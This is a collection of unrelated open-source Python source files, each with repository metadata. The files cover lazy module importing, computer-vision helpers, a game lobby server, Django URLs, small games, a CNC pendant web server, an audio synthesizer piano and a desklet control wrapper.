        return _demandmod(name, globals, locals, level)
    else:
        # There is a fromlist.
        # from a import b,c,d
        # from . import b,c,d
        # from .a import b,c,d

        # level == -1: relative and absolute attempted (Python 2 only).
        # level >= 0: absolute only (Python 2 w/ absolute_import and Python 3).
        # The modern Mercurial convention is to use absolute_import everywhere,
        # so modern Mercurial code will have level >= 0.

        # The name of the module the import statement is located in.
        globalname = globals.get("__name__")

        def processfromitem(mod, attr):
            """Process an imported symbol in the import statement.

            If the symbol doesn't exist in the parent module, and if the
            parent module is a package, it must be a module. We set missing
            modules up as _demandmod instances.
            """
            symbol = getattr(mod, attr, nothing)
            nonpkg = getattr(mod, "__path__", nothing) is nothing
            if symbol is nothing:
                if nonpkg:
                    # do not try relative import, which would raise ValueError,
                    # and leave unknown attribute as the default __import__()
                    # would do. the missing attribute will be detected later
                    # while processing the import statement.
                    return
                mn = "%s.%s" % (mod.__name__, attr)
                if mn in ignore:
                    importfunc = _origimport
                else:
                    importfunc = _demandmod
                symbol = importfunc(attr, mod.__dict__, locals, level=1)
                setattr(mod, attr, symbol)

            # Record the importing module references this symbol so we can
            # replace the symbol with the actual module instance at load
            # time.
            if globalname and isinstance(symbol, _demandmod):
                symbol._addref(globalname)

        def chainmodules(rootmod, modname):
            # recurse down the module chain, and return the leaf module
            mod = rootmod
            for comp in modname.split(".")[1:]:
                obj = getattr(mod, comp, nothing)
                if obj is nothing:
                    obj = _demandmod(comp, mod.__dict__, mod.__dict__, level=1)
                    setattr(mod, comp, obj)
                elif mod.__name__ + "." + comp in sys.modules:
                    # prefer loaded module over attribute (issue5617)
                    obj = sys.modules[mod.__name__ + "." + comp]
                mod = obj
            return mod

        if level >= 0:
            if name:
                # "from a import b" or "from .a import b" style
                rootmod = _hgextimport(_origimport, name, globals, locals, level=level)
                mod = chainmodules(rootmod, name)
            elif _pypy:
                # PyPy's __import__ throws an exception if invoked
                # with an empty name and no fromlist.  Recreate the
                # desired behaviour by hand.
                mn = globalname
                mod = sys.modules[mn]
                if getattr(mod, "__path__", nothing) is nothing:
                    mn = mn.rsplit(".", 1)[0]
                    mod = sys.modules[mn]
                if level > 1:
                    mn = mn.rsplit(".", level - 1)[0]
                    mod = sys.modules[mn]
            else:
                mod = _hgextimport(_origimport, name, globals, locals, level=level)

            for x in fromlist:
                processfromitem(mod, x)

            return mod

        # But, we still need to support lazy loading of standard library and 3rd
        # party modules. So handle level == -1.
        mod = _hgextimport(_origimport, name, globals, locals)
        mod = chainmodules(mod, name)
        for x in fromlist:
            processfromitem(mod, x)
        return mod
# Module names excluded from demand-loading (populated via init()).
ignore = set()


def init(ignorelist):
    """Set the collection of module names that must never be demand-loaded."""
    global ignore
    ignore = set(ignorelist)
def isenabled():
    """Return True when the demand-loading __import__ hook is installed."""
    return builtins.__import__ == _demandimport
def enable():
    """Enable global demand-loading of modules."""
    builtins.__import__ = _demandimport
def disable():
    """Disable global demand-loading of modules."""
    builtins.__import__ = _origimport
@contextmanager
def deactivated():
    """Context manager for disabling demandimport in 'with' blocks."""
    demandenabled = isenabled()
    if demandenabled:
        disable()

    try:
        yield
    finally:
        # Re-install the hook only if it was active on entry.
        if demandenabled:
            enable()
|
facebookexperimental/eden
|
eden/scm/edenscm/hgdemandimport/demandimportpy2.py
|
Python
|
gpl-2.0
| 10,941
|
# -*- coding: utf-8 -*-
# Ocvfw
#
# Copyright 2009 Flavio Percoco Premoli
#
# This file is part of Ocvfw.
#
# Ocvfw is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2 as published
# by the Free Software Foundation.
#
# Ocvfw is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ocvfw. If not, see <http://www.gnu.org/licenses/>.
"""Ocvfw Global Vars."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2008 Flavio Percoco Premoli"
__license__ = "GPLv2"
import os
from . import debug
# Absolute path of this package's directory, used to locate bundled data files.
abs_path = os.path.abspath(os.path.dirname(__file__))

# Haar-cascade XML files shipped with Ocvfw, keyed by the feature they detect.
haar_cds = { 'Face' : "%s/haars/haarcascade_frontalface_alt.xml" % abs_path,
             'Eyes' : "%s/haars/frontalEyes35x16.xml" % abs_path,
             #'Eyes' : "../ocvfw/haars/haarcascade_eye_tree_eyeglasses.xml",
             'Mouth' : "%s/haars/Mouth.xml" % abs_path}

# Channel count per supported color space name.
colors = { "gray" : { "ch" : 1 },
           "rgb" : { "ch" : 3 },
           "bgr" : { "ch" : 3 }}

# CV common lib
cv = None

# Highgui common lib
hg = None
def get_ch(color):
    """Return the number of channels of the given color space name."""
    return colors[color]["ch"]
def singleton(cls):
    """Decorator: make ``cls`` always yield one shared instance."""
    cache = {}

    def getinstance():
        # Lazily create the shared instance on first request.
        if cls not in cache:
            cache[cls] = cls()
            debug.debug("Commons", "New Singleton Add (%s)" % cls)
        return cache[cls]

    return getinstance
|
lhotchkiss/mousetrap
|
src/mousetrap/ocvfw/commons.py
|
Python
|
gpl-2.0
| 1,675
|
# -*- coding: utf-8 -*-
# vim: set et sts=4 sw=4 encoding=utf-8:
#
# This file is part of Warzone 2100.
# Copyright (C) 2011 Warzone 2100 Project
#
# Warzone 2100 is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Warzone 2100 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Warzone 2100; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
###############################################################################
__all__ = ['GameDB']
from itertools import count as iterCount
from twisted.internet import defer
from twisted.python import log
from twisted.internet.task import LoopingCall
from UserDict import IterableUserDict
from wzlobby.game import Game
from wzlobby.tools import testConnect
from wzlobby import settings
class GameDB(IterableUserDict):
    """In-memory registry of hosted games, keyed by game id."""

    def __init__(self):
        self.data = {}
        # Generator yielding unique, increasing game ids.
        self.numgen = iterCount(1)

    def create(self, lobby_ver, register=False):
        """Create a new Game with a fresh id; optionally register it."""
        game_id = self.numgen.next()
        game = Game(lobby_ver, game_id)
        if settings.debug:
            log.msg('Created game: %d' % game_id)
        if register:
            self.register(game)
        return game

    def register(self, game):
        # Make the game visible to lobby queries.
        self.data[game['gameId']] = game

    def updateGame(self, game_id, infos):
        """Merge ``infos`` into a known game; False when the id is unknown."""
        if not game_id in self.data:
            log.err('Unknown game %s' % game_id)
            return False

        self.data[game_id].update(infos)
        return True

    def remove(self, game):
        """Drop a game from the registry; False when it was not registered."""
        try:
            del(self.data[game['gameId']])
            log.msg('Removed game: %d' % game['gameId'])
        except KeyError:
            return False

        return True

    def check(self, game):
        """ Starts a loop which checks the given game every settings.check_interval seconds
        """
        if game['host'] is None or game['description'] is None:
            return defer.fail(Exception('Ignoring empty games.'))

        # Reject games whose name contains a blacklisted word.
        hostname = game['description'].lower().split(' ')
        if not settings.badwords.isdisjoint(hostname):
            log.msg('Game name not acceptable.')
            return defer.fail(Exception('Game name not acceptable. The game is NOT hosted, change the name of your game.'))

        # Restart any previous per-game checking loop.
        if game.lCall and game.lCall.running:
            game.lCall.stop()

        d = self._check(game)
        d.addCallback(lambda x: settings.getMotd(game['multiVer']))

        # Start the loopingcall
        if not game.lCall:
            game.lCall = LoopingCall(self._check, game)
            d2 = game.lCall.start(settings.check_interval, now=False)
            # Ignore future errors on the LoopingCall
            d2.addErrback(lambda x: '')

        return d

    def _check(self, game):
        """ Check the game for its connectivity and removes it on failures.

        returns a C{twisted.internet.defer.Deferred}
        """
        def remove(failure):
            # Connection failed: drop the game and propagate the error.
            self.remove(game)
            return defer.fail(Exception('Game unreachable, failed to open a connection to port %d.' % game['port']))

        d = testConnect(game['host'], game['port'])
        d.addErrback(remove)
        return d
|
pcdummy/wzlobbyserver-ng
|
wzlobby/gamedb.py
|
Python
|
gpl-2.0
| 3,626
|
from django.conf.urls import patterns, url
from database import views
from djgeojson.views import GeoJSONLayerView
from database.models import DatabaseEntry
# URL routes for the database app (legacy Django patterns() style).
urlpatterns = patterns('',
    url(r'^$', views.index, name='index'),
    url(r'^collections/$', views.collections, name='collections'),
    # GeoJSON layer consumed by the map view below
    url(r'^map_json/$', views.MapLayer.as_view(
            model=DatabaseEntry,
            properties=['popupcontent','violation'],
        ),
        name='incidents'),
    url(r'^map/$', views.map, name='map'),
    url(r'^collection/(?P<id>[0-9]+)/$', views.collection, name='collection'),
    # Detail page for a single database entry (numeric slug)
    url(r'^(?P<slug>[0-9]+)/$', views.detail, name='detail')
)
|
crito/syrianarchive
|
database/urls.py
|
Python
|
gpl-2.0
| 637
|
# -*- mode:python; coding:utf-8; -*-
# created: 06.07.2010 19:19
# description: Bomberbot radius bonuse representation
class Radius(object):
    """Bomberbot radius bonus placed on the board."""

    def __init__(self, x, y):
        """
        @type x: int
        @param x: X position.
        @type y: int
        @param y: Y position.
        """
        self.x, self.y = x, y
|
eugenezamriy/bomberbot
|
bomberlib/radius.py
|
Python
|
gpl-2.0
| 340
|
#!/usr/bin/env python
"""
This file is part of Life Fighter.
"""
#Import Modules
import pygame
from pygame.locals import *
from sprites import *
# Warn when optional pygame subsystems are unavailable (Python 2 syntax).
if not pygame.font: print 'Warning, fonts disabled'
if not pygame.mixer: print 'Warning, sound disabled'

#Defined values
WINDOW_TITLE = "Life Fighter 0.01"

# Window size in pixels
width = 800
height = 600

#n = 10
# Grid dimensions: columns x rows
n1 = 18
n2 = 14
#if n < 20:
#    line = 2
#else:
#    line = 1
# Grid line width in pixels
line = 1

# Grid offset from the window's top-left corner
x_off = 25
y_off = 75
#step = (width - 2 * x_off) / n1
#step = (height - 2 * y_off) / n2
# Cell size in pixels
step = 35
def main():
    """Set up pygame, build the Life grid and run the event loop."""
    #Initialize Everything
    pygame.init()
    screen = pygame.display.set_mode((width, height))
    pygame.display.set_caption(WINDOW_TITLE)

    #Create The Backgound
    # NOTE(review): bg_color presumably comes from the star-import of
    # ``sprites`` -- confirm.
    background = pygame.Surface(screen.get_size())
    background = background.convert()
    background.fill(bg_color)

    #Display The Background
    screen.blit(background, (0, 0))
    #pygame.display.flip()

    grid = Grid(n1, n2, x_off, y_off, step, line)
    #gridGroup = pygame.sprite.RenderUpdates()#no pude user GroupSingle :(
    #gridGroup.add(grid)
    cellsGroup = pygame.sprite.RenderUpdates()

    #Test: seed the board with a glider and a blinker
    glider = [(1,0), (2,1), (0,2), (1,2), (2,2)]
    other = [(5,5), (5,6), (5,7)]
    for key in glider + other:
        grid.cells[key].birth_now()
        #cellsGroup.add(grid.cells[key])
    grid.set_hero(2,1)

    #ENT Test
    for key in grid.cells:
        cellsGroup.add(grid.cells[key])

    #gridGroup.draw(screen)
    screen.blit(grid.image, grid.rect)
    cellsGroup.draw(screen)
    pygame.display.flip()

    clock = pygame.time.Clock()

    #Main loop
    while True:
        clock.tick(10) #slower than 10 frame per second
        for event in pygame.event.get():
            if event.type == QUIT:
                return
            if event.type == KEYDOWN:
                # Space advances one generation; arrows move the hero.
                if event.key == K_SPACE:
                    grid.beat()
                elif event.key == K_LEFT:
                    grid.hero_left()
                elif event.key == K_RIGHT:
                    grid.hero_right()
                elif event.key == K_UP:
                    grid.hero_up()
                elif event.key == K_DOWN:
                    grid.hero_down()
        screen.blit(grid.image, grid.rect)
        #cellsGroup.empty()
        #cellsGroup.add(alive_cells)
        cellsGroup.draw(screen)
        pygame.display.flip()
        #pygame.display.update(rects)


# Script entry point
if __name__ == '__main__':
    main()
|
jjconti/life-fighter
|
extra/old/game.py
|
Python
|
gpl-2.0
| 2,468
|
# -*- coding: latin1 -*-
# $Id: CNCPendant.py,v 1.3 2014/10/15 15:04:48 bnv Exp bnv $
#
# Author: Vasilis.Vlachoudis@cern.ch
# Date: 06-Oct-2014
__author__ = "Vasilis Vlachoudis"
__email__ = "Vasilis.Vlachoudis@cern.ch"
import os
import sys
#import cgi
import json
import threading
import urllib
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
try:
import BaseHTTPServer as HTTPServer
except ImportError:
import http.server as HTTPServer
HOSTNAME = "localhost"
port = 8080
httpd = None
prgpath = os.path.abspath(os.path.dirname(sys.argv[0]))
#==============================================================================
# Simple Pendant controller for CNC
#==============================================================================
class Pendant(HTTPServer.BaseHTTPRequestHandler):
    """Minimal web "pendant" remote control for bCNC.

    NOTE(review): the handler writes str objects to ``wfile`` and calls
    ``urllib.unquote`` -- this assumes Python 2; Python 3 would need bytes
    and ``urllib.parse.unquote``.
    """

    #----------------------------------------------------------------------
    def log_message(self, fmt, *args):
        # Only requests to the main page log them, all other ignore
        if args[0].startswith("GET / "):
            HTTPServer.BaseHTTPRequestHandler.log_message(self, fmt, *args)

    #----------------------------------------------------------------------
    def do_HEAD(self, rc=200, content="text/html"):
        # Emit the status line and the Content-type header for every reply.
        self.send_response(rc)
        self.send_header("Content-type", content)
        self.end_headers()

    #----------------------------------------------------------------------
    def do_GET(self):
        """Respond to a GET request."""
        # Split "page?key=value" into the page and a query-string dict.
        if "?" in self.path:
            page,arg = self.path.split("?",1)
            arg = dict(urlparse.parse_qsl(arg))
        else:
            page = self.path
            arg = None
        #print self.path,type(self.path)
        #print page
        #print arg

        if page == "/send":
            if arg is None: return
            for key,value in arg.items():
                # gcode lines go to the app queue; pendant commands aside
                if key=="gcode":
                    for line in value.split('\n'):
                        httpd.app.queue.put(line+"\n")
                elif key=="cmd":
                    httpd.app.pendant.put(urllib.unquote(value))
            #send empty response so browser does not generate errors
            self.do_HEAD(200, "text/text")
            self.wfile.write("")

        elif page == "/state":
            # Current machine position as JSON
            self.do_HEAD(200, "text/text")
            self.wfile.write(json.dumps(httpd.app._pos))

        elif page == "/config":
            self.do_HEAD(200, "text/text")
            snd = {}
            snd["rpmmax"] = httpd.app.get("CNC","spindlemax")
            self.wfile.write(json.dumps(snd))

        elif page == "/icon":
            if arg is None: return
            self.do_HEAD(200, "image/gif")
            filename = os.path.join(
                os.path.abspath(
                    os.path.dirname(sys.argv[0])),
                "icons",
                arg["name"]+".gif")
            try:
                f = open(filename,"rb")
                self.wfile.write(f.read())
                f.close()
            except:
                # Missing/unreadable icon: reply with an empty body
                pass

        else:
            # Everything else is served as a static file
            self.mainPage(page[1:])

    # ---------------------------------------------------------------------
    def mainPage(self, page):
        """Serve a static file from the program directory."""
        global prgpath

        #handle certain filetypes
        filetype = page.rpartition('.')[2]
        if filetype == "css": self.do_HEAD(content="text/css")
        elif filetype == "js": self.do_HEAD(content="text/javascript")
        else: self.do_HEAD()

        if page == "": page = "index.html"
        try:
            f = open(os.path.join(prgpath,page),"r")
            self.wfile.write(f.read())
            f.close()
        except IOError:
            # Fallback 404-ish page
            self.wfile.write("""<!DOCTYPE html>
<html>
<head>
<title>Errortitle</title>
<meta name="viewport" content="width=device-width,initial-scale=1, user-scalable=yes" />
</head>
<body>
Page not found.
</body>
</html>
""")
# -----------------------------------------------------------------------------
def _server(app):
    """Run the pendant HTTP server; blocks until shut down.

    Executed in the worker thread started by start(). ``app`` is the bCNC
    application object exposed to request handlers as ``httpd.app``.
    """
    global httpd

    server_class = HTTPServer.HTTPServer
    try:
        httpd = server_class(('', port), Pendant)
        httpd.app = app
        httpd.serve_forever()
    # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit still
    # propagate. Any error (e.g. port already in use) clears the handle so
    # start() can be retried.
    except Exception:
        httpd = None
# -----------------------------------------------------------------------------
def start(app):
    """Start the pendant web server in a background thread.

    Returns False when a server is already running, True otherwise.
    """
    global httpd

    if httpd is not None: return False
    thread = threading.Thread(target=_server, args=(app,))
    thread.start()
    return True
# -----------------------------------------------------------------------------
def stop():
    """Shut down the running pendant web server, if any.

    Returns False when no server is running, True otherwise.
    """
    global httpd

    if httpd is None: return False
    httpd.shutdown()
    httpd = None
    return True
if __name__ == '__main__':
    # Bug fix: start() requires the application object, so the previous
    # bare start() call raised a TypeError. When run standalone there is
    # no bCNC application; pass None so the server at least starts and
    # can serve static pages (app-backed endpoints will fail per-request).
    start(None)
|
mandrav/bCNC
|
CNCPendant.py
|
Python
|
gpl-2.0
| 4,047
|
"""
$Id: piano.py 852 2014-06-29 22:13:08Z weegreenblobbie $
Nsound is a C++ library and Python module for audio synthesis featuring
dynamic digital filters. Nsound lets you easily shape waveforms and write
to disk or plot them. Nsound aims to be as powerful as Csound but easy to
use.
Copyright (c) 2004 to Present Nick Hilton
weegreenblobbie_at_yahoo_com
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Library General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
import argparse
import multiprocessing
import queue
import sys
import time
from queue import Queue

import pygame

import Nsound as ns
#------------------------------------------------------------------------------
# Globals
# Number of worker processes (simultaneous voices)
N_THREADS = 3

# Sample rate (Hz), output channel count and playback buffering
SR = 48000.0
CHANNELS = 1
N_BUFFERS = 10
T = 0.01

# Higher latency on non-Linux platforms
if 'linux' not in sys.platform:
    T = 0.05
    N_BUFFERS = 3

# worker state machine
enum = 0
WAITING = enum ; enum += 1
PLAYING = enum ; enum += 1
RELEASING = enum; enum += 1

# Oscillator selector constants
SINE = enum; enum += 1
SAW = enum; enum += 1
SQUARE = enum; enum += 1

# Random seed for chorus
#~rng = ns.RngTausworthe()
#~seed = rng.get()
#~print("seed = ", seed)
seed = 1108683026
def worker(q, generator, n_harmonics, chorus):
    """Audio worker process: synthesize one voice and stream it out.

    Protocol over ``q`` (a multiprocessing.Queue): the worker first puts
    True/False to report initialization; afterwards it receives a
    frequency (note on), any non-frequency value (note off) or "QUIT".
    """
    #--------------------------------------------------------------------------
    # Initialize

    if generator == SINE:
        gen = ns.Sine(SR)
    elif generator == SAW:
        gen = ns.Sawtooth(SR, n_harmonics)
    elif generator == SQUARE:
        gen = ns.Square(SR, n_harmonics)
    else:
        raise RuntimeError("Unknown generator %d" % generator)

    if chorus > 1:
        # Need to use same random number geneator accross workers.
        rng = gen.getRandomNumberGenerator()
        rng.setSeed(seed)
        gen.setChorus(chorus, 0.01)

    gen.setRealtime(True)

    try:
        playback = ns.AudioPlaybackRt(SR, CHANNELS, N_BUFFERS, T)
        #playback.setBufferUnderrunMode(ns.BUM_NOISE)
    # Narrowed from a bare ``except:`` so KeyboardInterrupt still works.
    except Exception:
        q.put(False)
        sys.stderr.write("FAILURE: failed to create audio playback object!\n")
        sys.stderr.flush()
        return

    # Sharper envelope
    env = ns.EnvelopeAdsr(SR, 0.2, 0.4, 0.333, 0.1)

    # Tell the main thread we succeeded in initializing our
    # nsound objects.
    q.put(True)
    # Busy-wait until the parent has consumed the ready flag.
    while q.full():
        pass

    key_on = None
    state = WAITING
    dur = T
    N_SAMPLES = int(dur * SR + 0.5)

    #--------------------------------------------------------------------------
    # Sound processing loop

    process_key = False
    while True:
        try:
            x = q.get(False)
            process_key = True
        # Bug fix: with ``from queue import Queue`` the *class* has no
        # ``Empty`` attribute -- the empty-queue exception lives on the
        # ``queue`` module itself, which multiprocessing queues raise.
        except queue.Empty:
            process_key = False

        if process_key:
            if x == "QUIT":
                playback.stop()
                return
            if state == WAITING:
                # Note on: remember the frequency and start playing
                freq = x
                key_on = True
                state = PLAYING
            elif state == PLAYING:
                # Note off: enter the envelope release phase
                key_on = False
                state = RELEASING

        if state == WAITING:
            continue

        # Render one buffer of samples through the ADSR envelope
        for i in range(N_SAMPLES):
            sample = env.shape(0.333 * gen.generate(freq), key_on)
            playback.play(sample)

        # Finished? state transition
        if state == RELEASING:
            if env.is_done():
                state = WAITING
                playback.stop()
                gen.reset()
                env.reset()
def main():
    """Parse the command line, spawn audio workers and run the key loop."""
    parser = argparse.ArgumentParser(description = 'Simple piano.')

    parser.add_argument(
        '--chorus',
        dest = 'CHORUS',
        default = 0,
        type = int,
        help = 'Add chorus with N voices')

    parser.add_argument(
        '--saw',
        dest = 'USE_SAW',
        action = 'store_true',
        default = False,
        help = 'Generate Sawtooth waves')

    parser.add_argument(
        '--square',
        dest = 'USE_SQUARE',
        action = 'store_true',
        default = False,
        help = 'Generate Square waves')

    parser.add_argument(
        '--n',
        dest = 'N_HARMONICS',
        type = int,
        default = None,
        help = """Specify the number of harmonics for Sawtooth or Square
generators (default is 7)""")

    parser.add_argument(
        '-j',
        '--jack',
        dest = 'use_jack',
        default = False,
        action = 'store_true',
        help = """Use the JACK portaudio Host API, if the JACK server isn't
running, you will get undefined behavior""")

    args = parser.parse_args()

    if args.use_jack:
        print("Will try to use JACK (known to work on Linux)")
        ns.AudioPlaybackRt.use_jack(True)

    # Resolve generator selection from the flags
    generator = SINE
    n_harmonics = 7
    chorus = args.CHORUS

    if args.USE_SAW:
        generator = SAW
    elif args.USE_SQUARE:
        generator = SQUARE

    if args.N_HARMONICS is not None:
        if args.N_HARMONICS <= 0:
            raise ValueError("N harmonics must be >= 1")
        n_harmonics = args.N_HARMONICS

    # Map keys to frequencies (one octave starting at middle C)
    key_to_freq = {
        pygame.K_z: 261.626,
        pygame.K_s: 277.183,
        pygame.K_x: 293.665,
        pygame.K_d: 311.127,
        pygame.K_c: 329.628,
        pygame.K_v: 349.228,
        pygame.K_g: 369.994,
        pygame.K_b: 391.995,
        pygame.K_h: 415.305,
        pygame.K_n: 440.000,
        pygame.K_j: 466.164,
        pygame.K_m: 493.883,
    }

    # Spawn the worker pool; each worker owns a 1-slot command queue.
    q_pool = []
    q_idle = set()
    p_pool = []
    for i in range(N_THREADS):
        q = multiprocessing.Queue(maxsize = 1)
        p = multiprocessing.Process(
            target = worker,
            args = (q, generator, n_harmonics, chorus) )
        p.start()

        # Read from the Queue that the process initialized and is ready.
        good = q.get()
        if not good:
            sys.exit(1)

        q_idle.add(q)
        q_pool.append(q)
        p_pool.append(p)

    # Active notes: pressed key -> the worker queue playing it
    key_to_queue = {}

    # Init only the display, otherwise when using JACK Audio Connection Kit,
    # pygame won't exit cleanly.
    pygame.display.init()

    # Open window
    window = pygame.display.set_mode((400, 100))
    pygame.display.set_caption("Piano! %s" % ns.__package__)

    # Turn off key repeats
    pygame.key.set_repeat()

    print("Hello Piano!")
    print("Press ESC to quit.")
    print("Press [z,s,x,d,c,v,g,b,h,n,j,m] to play a note.")

    main_loop = True
    while main_loop:
        event = pygame.event.wait()
        if event.type == pygame.KEYDOWN:
            c = event.key

            # Break out of loop
            if c in [pygame.K_ESCAPE]:
                main_loop = False
                break

            if c in key_to_freq:
                # Claim an idle worker and send it the note frequency
                if len(q_idle) == 0:
                    print("no worker thread available!")
                    continue

                freq = key_to_freq[c]
                q = q_idle.pop()
                key_to_queue[c] = q
                q.put(freq)
                sys.stdout.write("+")
                sys.stdout.flush()

        elif event.type == pygame.KEYUP:
            c = event.key
            if c in key_to_queue:
                # Release the note and return the worker to the idle set
                q = key_to_queue[c]
                q.put(None)
                del key_to_queue[c]
                q_idle.add(q)
                sys.stdout.write("-")
                sys.stdout.flush()

        elif event.type == pygame.QUIT:
            main_loop = False
            break

    # Shut all workers down and wait for them to exit.
    for q in q_pool:
        q.put("QUIT")

    for p in p_pool:
        p.join()

    pygame.display.quit()

    print("")
    print("Goodbye!")


if __name__ == "__main__":
    main()
|
weegreenblobbie/nsound
|
src/examples/piano.py
|
Python
|
gpl-2.0
| 8,172
|
#!/usr/bin/python
import btcpos
import threading
import Queue
# Account / runtime configuration -- fill these in before running.
identifier=''
forwardingaddress=''
password=''
logfile=''
#eg: identifier='6ne3m2m7-6534-2k6l-2h1b-59v2xm0g8yio'
#    password='mypassword'
#    forwardingaddress='17yHkgQooxxMdB7iqNbBXDrV8YdMrMes5d'
#    logfile='/path/to/btcpos.csv'

# Poll for transactions on a background thread while the GUI owns the
# main thread.
p= btcpos.POS(identifier,password,forwardingaddress,logfile)
t= threading.Thread(target=p.transactionLoop)
t.start()
p.gui.mainloop()
|
WeMeetAgain/btcpos
|
run.py
|
Python
|
gpl-2.0
| 433
|
from Vault import Vault
from PropertyInterface import PropertyInterface
from main.Control import Control
from plugin.Interface import Interface
from copy import deepcopy
#
# Wrapper for controls.
#
class ControlWrapper(object):
    def __init__(self, control, size):
        # Wrap ``control`` in an array of ``size`` independent copies.
        # All private state is stored via mangled __dict__ keys because
        # __setattr__ below is overridden to proxy property writes.
        self.__dict__["_ControlWrapper__length"] = size
        if size <= 0:
            size = 1

        # We need to deepcopy in order to get individually changeable
        # Control instances
        try:
            self.__dict__["_ControlWrapper__control"] = \
                Vault( [ deepcopy(control)
                         for i in range(size) ] )
        except:
            # Control couldn't be copied: fall back to a single shared
            # instance and drop out of list mode.
            self.__dict__["_ControlWrapper__control"] = \
                Vault( [ control ] )
            if self.__length > 0:
                log(_("Error: Control %s can't be replicated! This is a BUG in the Desklet!"
                      "\nThings probably won't work right for you.") % control)
                self.__dict__["_ControlWrapper__length"] = 0
                size = 1
        else:
            # Initialize all initial copies
            for ctl in self.__dict__["_ControlWrapper__control"](open):
                ctl.__init__()

        # Keep an original copy around for extending the array
        self.__dict__["_ControlWrapper__original_control"] = Vault(control)
        # deactivate the original control
        ctl = self.__dict__["_ControlWrapper__original_control"](open)
        ctl.stop()

        # Create a property handler for each deep copy of control
        self.__dict__["_ControlWrapper__properties"] = \
            [ PropertyInterface(self.__control(open)[i])
              for i in range(size) ]

        ids = [ Interface.get_id(i)
                for i in Interface.get_interfaces( control.__class__ ) ]
        taz_ids = [ Interface.get_taz_style_id(i)
                    for i in Interface.get_interfaces( control.__class__ ) ]
        self.__dict__["_ControlWrapper__ifaces_id"] = \
            Vault( tuple(ids + taz_ids) )
    def __len__(self):
        # Number of replicated controls; 0 means scalar (non-list) mode.
        return self.__length
def __setattr__(self, name, value):
if self.__length > 0:
if name == "length":
# A little bounds checking
size = value
if value < 0:
value = 0
log(_("Warning: Value of property \"length\" must " \
"be >= 0 (setting to %d)" % value))
if value == 0:
log(_("Warning: Setting value of property " \
"\"length\" to 0 would disable list mode"))
size = 1
# Don't do anything if value isn't changing
if size != self.__length:
if size > self.__length:
# Append new copies of the control
self.__dict__["_ControlWrapper__control"] = \
Vault( self.__control(open) + \
[ deepcopy(self.__original_control(open)) \
for i in range(self.__length, size) ] )
# Initialize all new copies of the control
for ctl in [ self.__dict__["_ControlWrapper__control"](open)[i] \
for i in range(self.__length, size) ]:
ctl.__init__()
# Append new PropertyInterface instances
self.__dict__["_ControlWrapper__properties"] = \
self.__properties + \
[ PropertyInterface(self.__control(open)[i]) \
for i in range(self.__length, size) ]
elif size < self.__length:
# We want to leave the "0th" item alone, which is
# handled by the above conditionals
for i in range(size, self.__length):
del self[size]
self.__dict__["_ControlWrapper__length"] = value
else: # name != "length"
# This is the case where someone tries to set a property
# of this class when the length != 0. They should know
# better if they've gone and changed the length, but we'll
# be nice and print out some informational warnings.
log(_("Warning: Property \"%(property)s\" must be " \
"indexed (length == %(length)d).") % \
{'property': name, 'length': self.__length})
return
else: # length <= 0
# Backwards compatibility
self.__dict__["_ControlWrapper__properties"][0].__setattr__(name, value)
def __getattr__(self, name):
if name in Control.AUTHORIZED_METHODS:
if self.__length <= 0:
return getattr(self.__control(open)[0], name)
else:
return self.__control(open)
if self.__length <= 0:
# Backwards compatibility
return self.__dict__["_ControlWrapper__properties"][0].__getattr__(name)
elif name == "length":
return self.__length
else:
# This is the case where someone tries to set a property
# of this class when the length != 0. They should know
# better if they've gone and changed the length, but we'll
# be nice and print out some informational warnings.
log(_("Warning: Property \"%(property)s\" must be " \
"indexed (length == %(length)d).") % \
{'property': name, 'length': self.__length})
return
def __setitem__(self, idx, value):
if self.__length <= 0:
log(_("Warning: Control not initialized as an array in Desklet."))
raise IndexError
if (idx >= self.__length) or (idx + self.__length < 0):
raise IndexError("%d doesn't exist, length is %d" % (idx, self.__length))
return self.__properties[idx]
def __getitem__(self, idx):
if self.__length <= 0:
log(_("Warning: Control not initialized as an array in Desklet."))
raise IndexError
if (idx >= self.__length) or (idx + self.__length < 0):
raise IndexError("%d doesn't exist, length is %d" % (idx, self.__length))
return self.__properties[idx]
def __delitem__(self, idx):
if self.__length > 0:
if idx < 0:
idx = self.__length + idx
if idx < self.__length and idx >= 0:
# As long as we delete the same index of __control, there will be
# no property that uses that Control
del self.__dict__["_ControlWrapper__properties"][idx]
new_ctrl_list = self.__dict__["_ControlWrapper__control"](open)
new_ctrl_list[idx].stop()
del new_ctrl_list[idx]
#del self.__dict__["_ControlWrapper__control"]
self.__dict__["_ControlWrapper__control"] = Vault( new_ctrl_list )
self.__dict__["_ControlWrapper__length"] -= 1
else:
log(_("Warning: Trying to delete index %(index)d " \
"when length is %(length)d.") % \
{'index': idx, 'length': self.__length})
else:
log(_("Warning: Control not initialized as an array in Desklet; not deleting anything."))
def stop(self):
for c in self.__dict__["_ControlWrapper__control"](open):
try:
c.stop()
except StandardError, exc:
import traceback; traceback.print_exc()
log(_("Could not stop control %s" % c))
del c
# original control is already stopped
c = self.__dict__["_ControlWrapper__original_control"](open)
del c
def get_interfaces_id(self):
"""
@return : implemented interfaces' id
@rtype : list of str
"""
return self.__ifaces_id(open)
|
RaumZeit/gdesklets-core
|
scripting/ControlWrapper.py
|
Python
|
gpl-2.0
